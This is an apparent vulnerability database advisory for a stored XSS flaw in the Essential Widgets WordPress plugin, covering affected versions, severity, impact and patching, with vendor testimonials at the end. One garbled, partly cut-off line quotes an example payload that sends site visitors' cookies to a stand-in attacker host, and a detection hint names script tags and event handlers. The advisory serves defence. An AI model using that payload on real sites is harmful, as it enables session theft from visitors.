
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67543 is a Stored Cross-Site Scripting (XSS) vulnerability in the Catch Themes Essential Widgets WordPress plugin. It affects all versions through 2.2.2 (free) and through 2.7.x (Pro), with the patched versions being 2.3 (free) and 2.8 (Pro). The vulnerability was reported on October 27, 2025, by researcher Mdr and published by Patchstack on November 26, 2025, with CVE assignment on December 9, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium) (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), a Stored XSS flaw within the Essential Widgets plugin for WordPress. An authenticated attacker with at least Contributor or Developer-level privileges can inject malicious scripts into widget fields that are then persistently stored and rendered to site visitors. Exploitation requires low attack complexity and a network-accessible target, but does require user interaction (a privileged user must trigger the stored payload's rendering) (Patchstack).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site, which are then executed in the browsers of visiting users. This can lead to session hijacking, credential theft, unauthorized redirects, defacement, or delivery of malicious content to site visitors. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the plugin itself to affect end users' browsers (Patchstack).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.039%, indicating a very low probability of exploitation in the near term. Patchstack classifies this as low priority with no impactful threat currently observed. No CISA KEV catalog listing has been identified (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into an insufficiently sanitized input field.<script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads stored in the WordPress wp_options or widget-related database tables.The primary remediation is to update the Essential Widgets plugin to version 2.3 or later (free) or version 2.8 or later (Pro), which contain the fix for this vulnerability. Site administrators unable to update immediately should restrict Contributor and Developer role assignments to trusted users only, reducing the attack surface. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."